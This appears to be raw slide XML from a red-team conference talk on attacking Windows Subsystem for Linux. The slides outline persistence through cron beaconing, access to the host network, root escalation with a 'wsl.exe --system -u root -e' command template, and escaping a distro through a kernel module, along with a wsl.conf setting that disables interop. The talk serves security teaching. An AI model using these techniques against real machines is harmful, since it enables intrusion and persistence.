              <a:t>for the WSL logical device.”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="pl" sz="1200"/>
              <a:t>~ learn.microsoft.com</a:t>
            </a:r>
            <a:endParaRPr i="1"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4375"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl"/>
              <a:t>Windows Defender plugin for WSL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Google Shape;205;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1335150"/>
            <a:ext cx="6550500" cy="193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l" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>Linux processes created via </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="pl" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>ExecuteBinary()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t> will run in the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>root namespace of the WSL2 Virtual Machine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>. This namespace is not associated to any distribution and has a very minimal Mariner based root file system.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="pl" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>~ https://learn.microsoft.com/en-us/defender-endpoint/mde-plugin-wsl</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206" name="Google Shape;206;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4345075"/>
            <a:ext cx="69243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b="1" lang="pl" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="pl" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>https://github.com/microsoft/wsl-plugin-sample</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains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l">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL for Red Teams</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WSL attack vectors</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="217" name="Google Shape;217;p29"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="432975" y="1244150"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{EA303852-4C76-49B2-B6D6-87ABED8BA39D}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4134250"/>
                <a:gridCol w="4134250"/>
              </a:tblGrid>
              <a:tr h="562975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="pl" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="JetBrains Mono"/>
                          <a:ea typeface="JetBrains Mono"/>
                          <a:cs typeface="JetBrains Mono"/>
                          <a:sym typeface="JetBrains Mono"/>
                        </a:rPr>
                        <a:t>Linux side</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1800">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="JetBrains Mono"/>
                        <a:ea typeface="JetBrains Mono"/>
                        <a:cs typeface="JetBrains Mono"/>
                        <a:sym typeface="JetBrains Mono"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="378000" marL="91425">
                    <a:lnL cap="flat" cmpd="sng" w="28575">
                      <a:solidFill>
                        <a:schemeClr val="dk2">
                          <a:alpha val="0"/>
                        </a:schemeClr>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pl" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="JetBrains Mono"/>
                          <a:ea typeface="JetBrains Mono"/>
                          <a:cs typeface="JetBrains Mono"/>
                          <a:sym typeface="JetBrains Mono"/>
                        </a:rPr>
                        <a:t>Windows side</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1800">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="JetBrains Mono"/>
                        <a:ea typeface="JetBrains Mono"/>
                        <a:cs typeface="JetBrains Mono"/>
                        <a:sym typeface="JetBrains Mono"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="378000">
                    <a:lnL cap="flat" cmpd="sng" w="28575">
                      <a:solidFill>
                        <a:schemeClr val="dk2"/>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="28575">
                      <a:solidFill>
                        <a:schemeClr val="dk2">
                          <a:alpha val="0"/>
                        </a:schemeClr>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r>
              <a:tr h="1576450">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pl" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="JetBrains Mono"/>
                          <a:ea typeface="JetBrains Mono"/>
                          <a:cs typeface="JetBrains Mono"/>
                          <a:sym typeface="JetBrains Mono"/>
                        </a:rPr>
                        <a:t>attacker gains access to the WSL distro via malicious script, npm/pip package</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="JetBrains Mono"/>
                        <a:ea typeface="JetBrains Mono"/>
                        <a:cs typeface="JetBrains Mono"/>
                        <a:sym typeface="JetBrains Mono"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="378000" marL="91425">
                    <a:lnL cap="flat" cmpd="sng" w="28575">
                      <a:solidFill>
                        <a:schemeClr val="dk2">
                          <a:alpha val="0"/>
                        </a:schemeClr>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pl" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="JetBrains Mono"/>
                          <a:ea typeface="JetBrains Mono"/>
                          <a:cs typeface="JetBrains Mono"/>
                          <a:sym typeface="JetBrains Mono"/>
                        </a:rPr>
                        <a:t>attacker gains access to Windows machine with WSL installed</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="JetBrains Mono"/>
                        <a:ea typeface="JetBrains Mono"/>
                        <a:cs typeface="JetBrains Mono"/>
                        <a:sym typeface="JetBrains Mono"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="378000">
                    <a:lnL cap="flat" cmpd="sng" w="28575">
                      <a:solidFill>
                        <a:schemeClr val="dk2"/>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="28575">
                      <a:solidFill>
                        <a:schemeClr val="dk2">
                          <a:alpha val="0"/>
                        </a:schemeClr>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r>
              <a:tr h="1238625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pl" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="JetBrains Mono"/>
                          <a:ea typeface="JetBrains Mono"/>
                          <a:cs typeface="JetBrains Mono"/>
                          <a:sym typeface="JetBrains Mono"/>
                        </a:rPr>
                        <a:t>how to gain access to host OS?</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="JetBrains Mono"/>
                        <a:ea typeface="JetBrains Mono"/>
                        <a:cs typeface="JetBrains Mono"/>
                        <a:sym typeface="JetBrains Mono"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="378000" marL="91425">
                    <a:lnL cap="flat" cmpd="sng" w="28575">
                      <a:solidFill>
                        <a:schemeClr val="dk2">
                          <a:alpha val="0"/>
                        </a:schemeClr>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="28575">
                      <a:solidFill>
                        <a:schemeClr val="dk2"/>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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pl" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="JetBrains Mono"/>
                          <a:ea typeface="JetBrains Mono"/>
                          <a:cs typeface="JetBrains Mono"/>
                          <a:sym typeface="JetBrains Mono"/>
                        </a:rPr>
                        <a:t>how to employ WSL to achieve persistence, impair defenses</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="JetBrains Mono"/>
                        <a:ea typeface="JetBrains Mono"/>
                        <a:cs typeface="JetBrains Mono"/>
                        <a:sym typeface="JetBrains Mono"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="378000">
                    <a:lnL cap="flat" cmpd="sng" w="28575">
                      <a:solidFill>
                        <a:schemeClr val="dk2"/>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="28575">
                      <a:solidFill>
                        <a:schemeClr val="dk2">
                          <a:alpha val="0"/>
                        </a:schemeClr>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="28575">
                      <a:solidFill>
                        <a:schemeClr val="dk2">
                          <a:alpha val="0"/>
                        </a:schemeClr>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="28575">
                      <a:solidFill>
                        <a:schemeClr val="dk2">
                          <a:alpha val="0"/>
                        </a:schemeClr>
                      </a:solidFill>
                      <a:prstDash val="dash"/>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Access to the org’s network</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Google Shape;223;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WSL has access to the local network of the host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl"/>
              <a:t>machine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl"/>
              <a:t> by default </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl"/>
              <a:t>You can access assets through the corp VPN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Good ‘ol classics - pt.1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Google Shape;22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cron used to ‘beacon’ Linux/Windows binary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="230" name="Google Shape;230;p31" title="wsl-crontab.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3957100" y="1542300"/>
            <a:ext cx="5186899" cy="3601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Who are we? </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Google Shape;64;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4428500" y="1323600"/>
            <a:ext cx="4218900" cy="8928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b="1" lang="pl" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>Konrad Klawikowski</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="pl" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>@unrooted</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Google Shape;65;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2190450" y="4418000"/>
            <a:ext cx="4763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sz="1500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>https://github.com/redcode-labs/easyWSL</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;66;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353100" y="1373700"/>
            <a:ext cx="4218900" cy="89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l" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>Jakub Wróbel</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="pl" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>@wr0belj</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Google Shape;67;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2785848" y="2339975"/>
            <a:ext cx="3572322" cy="2078025"/>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Elevate to root via interop</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="236" name="Google Shape;236;p32" title="Screenshot 2025-05-22 at 19.14.02.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="327700" y="1947700"/>
            <a:ext cx="8266099" cy="1096675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Google Shape;237;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2739700"/>
            <a:ext cx="690000" cy="30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238" name="Google Shape;238;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="327700" y="1251863"/>
            <a:ext cx="796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800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>wsl.exe -d &lt;distro&gt; / </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>–-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>system -u root -e &lt;command&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains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Elevate to root via interop</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="244" name="Google Shape;244;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009375" y="1221037"/>
            <a:ext cx="7125226" cy="270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Disable interop</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="Google Shape;250;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solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$cat /etc/wsl.conf</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl"/>
              <a:t>[interop] </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl"/>
              <a:t>enabled = false</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl"/>
              <a:t>appendWindowsPath = false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l" sz="2680"/>
              <a:t>Distro jump out via kernel module</a:t>
            </a:r>
            <a:endParaRPr sz="2680"/>
          </a:p>
        </p:txBody>
      </p:sp>
